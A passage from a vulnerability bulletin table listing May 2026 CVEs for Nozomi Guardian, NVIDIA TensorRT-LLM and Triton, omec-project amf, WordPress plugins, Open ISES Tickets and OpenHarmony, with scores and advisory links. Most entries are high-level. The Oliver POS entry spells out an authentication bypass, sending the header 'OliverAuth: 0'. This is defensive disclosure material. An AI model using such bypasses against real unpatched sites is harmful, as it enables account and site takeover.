| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Credentials Manager functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious identity containing HTML tags. When a victim attempts to delete the affected identity, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40901 | https://security.nozominetworks.com/NN-2026:4-01 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Users functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can create a malicious user whose username contains HTML tags. When a victim attempts to delete a group containing the affected user, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40902 | https://security.nozominetworks.com/NN-2026:5-01 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Schedule Restore Archive functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious restore schedule containing HTML tags. When a victim views the affected schedule, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40903 | https://security.nozominetworks.com/NN-2026:6-01 |
| Nozomi Networks--Guardian | An Angular template injection vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing an Angular template payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the Angular template executes in their browser context, allowing the attacker to modify application data, or disrupt application availability. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 4.6 | CVE-2025-40900 | https://security.nozominetworks.com/NN-2026:3-01 |
| npitre--cramfs-tools | A vulnerability was detected in npitre cramfs-tools up to 2.2. Affected is the function change_file_status of the file cramfsck.c. Performing a manipulation results in symlink following. The attack requires a local approach. The exploit is now public and may be used. The patch is named b4a3a695c9873f824907bd15659f2a6ac7667b4f. It is recommended to apply a patch to fix this issue. | 2026-05-18 | 4.2 | CVE-2026-8784 | VDB-364408 | npitre cramfs-tools cramfsck.c change_file_status symlink VDB-364408 | CTI Indicators (IOB, IOC, IOA) Submit #811897 | GNU cramfs-tools below v2.2 Symlink Following https://github.com/npitre/cramfs-tools/issues/13 https://github.com/npitre/cramfs-tools/issues/13#issuecomment-4306102583 https://github.com/npitre/cramfs-tools/commit/b4a3a695c9873f824907bd15659f2a6ac7667b4f https://github.com/npitre/cramfs-tools/ |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-05-20 | 6.3 | CVE-2026-24142 | https://nvd.nist.gov/vuln/detail/CVE-2026-24142 https://www.cve.org/CVERecord?id=CVE-2026-24142 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability where an attacker could cause an unchecked return value to a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.5 | CVE-2026-24160 | https://nvd.nist.gov/vuln/detail/CVE-2026-24160 https://www.cve.org/CVERecord?id=CVE-2026-24160 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.3 | CVE-2026-24208 | https://nvd.nist.gov/vuln/detail/CVE-2026-24208 https://www.cve.org/CVERecord?id=CVE-2026-24208 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend, where an attacker could cause uncontrolled resource consumption. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.7 | CVE-2026-24215 | https://nvd.nist.gov/vuln/detail/CVE-2026-24215 https://www.cve.org/CVERecord?id=CVE-2026-24215 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| oliverpos--Oliver POS A WooCommerce Point of Sale (POS) | The Oliver POS - A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.4.2.6. The plugin protects its entire /wp-json/pos-bridge/* REST API namespace through the oliver_pos_rest_authentication() permission callback, which uses a loose PHP comparison (==) to compare the attacker-supplied 'OliverAuth' header value against the 'oliver_pos_authorization_token' option. On fresh installations where the admin has not yet completed the connection flow, this option is unset (get_option returns false). Due to PHP's type juggling, the loose comparison '0' == false evaluates to true, allowing an unauthenticated attacker to bypass authentication by sending 'OliverAuth: 0'. This grants full access to all POS API endpoints, enabling attackers to read user data (including administrator details), update user profiles (including email addresses), and delete non-admin users. An admin account email reset can lead to site takeover. | 2026-05-20 | 6.5 | CVE-2026-6072 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca6aa922-9c58-445c-b88a-3d1d1c95102c?source=cve https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L231 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L231 |
| olivesystem-- | The 診æ–ジェãƒãƒ¬ãƒ¼ã‚¿ä½œæˆãƒ—ラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode. | 2026-05-20 | 6.4 | CVE-2026-5293 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102 |
| omec-project--amf | A vulnerability was detected in omec-project amf up to 2.1.1. Affected by this vulnerability is an unknown functionality of the component PathSwitchRequest Handler. The manipulation results in memory corruption. The attack may be launched remotely. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. | 2026-05-23 | 6.3 | CVE-2026-9298 | VDB-365245 | omec-project amf PathSwitchRequest memory corruption VDB-365245 | CTI Indicators (IOB, IOC) Submit #811684 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/680 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A flaw has been found in omec-project amf up to 2.1.1. Affected by this issue is the function PDUSessionResourceModifyIndication of the file /go/src/amf/ngap/handler.go. This manipulation causes memory corruption. Remote exploitation of the attack is possible. The exploit has been published and may be used. Applying a patch is the recommended action to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9299 | VDB-365246 | omec-project amf handler.go PDUSessionResourceModifyIndication memory corruption VDB-365246 | CTI Indicators (IOB, IOC, IOA) Submit #811829 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/681 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability has been found in omec-project amf up to 2.1.1. This affects an unknown part of the component NGSetupRequest Handler. Such manipulation leads to memory corruption. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. It is best practice to apply a patch to resolve this issue. | 2026-05-23 | 6.3 | CVE-2026-9300 | VDB-365247 | omec-project amf NGSetupRequest memory corruption VDB-365247 | CTI Indicators (IOB, IOC) Submit #811841 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/679 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack is possible to be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9301 | VDB-365248 | omec-project amf NGReset Message memory corruption VDB-365248 | CTI Indicators (IOB, IOC) Submit #811842 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/678 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8779 | VDB-364403 | omec-project amf handler.go NGSetupRequest memory corruption VDB-364403 | CTI Indicators (IOB, IOC, IOA) Submit #811616 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/671 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8780 | VDB-364404 | omec-project amf NGAP Message dispatcher.go memory corruption VDB-364404 | CTI Indicators (IOB, IOC, IOA) Submit #811617 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/670 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A security flaw has been discovered in omec-project amf up to 2.1.3-dev. The impacted element is the function RANConfiguration of the file ngap/handler.go. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.2.0 is sufficient to resolve this issue. Upgrading the affected component is recommended. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8781 | VDB-364405 | omec-project amf handler.go RANConfiguration null pointer dereference VDB-364405 | CTI Indicators (IOB, IOC, IOA) Submit #811653 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/673 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A weakness has been identified in omec-project amf up to 2.1.3-dev. This affects an unknown function of the file ngap/handler.go of the component NGAP Message Handler. This manipulation causes null pointer dereference. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.2.0 mitigates this issue. It is recommended to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8782 | VDB-364406 | omec-project amf NGAP Message handler.go null pointer dereference VDB-364406 | CTI Indicators (IOB, IOC, IOA) Submit #811654 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/674 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A security vulnerability has been detected in omec-project amf up to 2.1.3-dev. This impacts the function UERadioCapabilityCheckResponse of the file ngap/dispatcher.go. Such manipulation leads to null pointer dereference. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2.0 will fix this issue. Upgrading the affected component is advised. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8783 | VDB-364407 | omec-project amf dispatcher.go UERadioCapabilityCheckResponse null pointer dereference VDB-364407 | CTI Indicators (IOB, IOC, IOA) Submit #811655 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/675 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48213 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute and an inline JavaScript string literal. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48214 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-nm-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in circle.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48215 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-circle-php-frm-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in db_loader.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema) directly into HTML form input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48216 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-db-loader-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in delete_module.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (module_choice, flag, confirmation) directly into rendered HTML content and form action attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48217 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-delete-module-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in icons/buttons/landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_name and frm_id POST parameters directly into rendered HTML content and inline JavaScript. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48218 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-icons-buttons-landb-php-frm-name-and-frm-id-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics202.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48219 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics202-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48220 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205a.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48221 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205a-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48222 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213rr.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48223 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213rr-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics214.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48224 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics214-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the _type POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48225 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-landb-php-type-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in os_watch.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ref and mode_orig POST parameters directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48226 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-os-watch-php-ref-and-mode-orig-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48227 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-php-id-and-ticket-id-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_w.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48228 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-w-php-id-and-ticket-id-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_i.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48229 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-i-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ticketsmdb_import.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (mdbhost, mdbdb, mdbuser, mdbpassword, mdbprefix, ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix) directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48230 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ticketsmdb-import-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded WhitePages reverse-phone API key in wp1.php that is committed to the public source repository. Any actor with read access to the source tree can extract the key and use it to make third-party API calls billed to or rate-limited against the original owner's WhitePages account. | 2026-05-21 | 5.3 | CVE-2026-48243 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-whitepages-api-key-in-wp1-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in settings.inc.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner's Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48244 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-settings-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in tables.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner's Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48245 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-tables-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in ajax/reports.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for Google Maps Directions API lookups during incident report generation. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48246 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-ajax-reports-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/functions.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for general-purpose outbound HTTPS requests issued by the shared helper functions. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48247 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-functions-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests issued during the login/authentication flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48248 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-login-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in rm/incs/mobile_login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests issued during the mobile (RouteMate) login flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48249 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-rm-incs-mobile-login-inc-php |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker arbitrary code execution. | 2026-05-19 | 6.5 | CVE-2026-28733 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak | 2026-05-19 | 5.5 | CVE-2026-25850 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
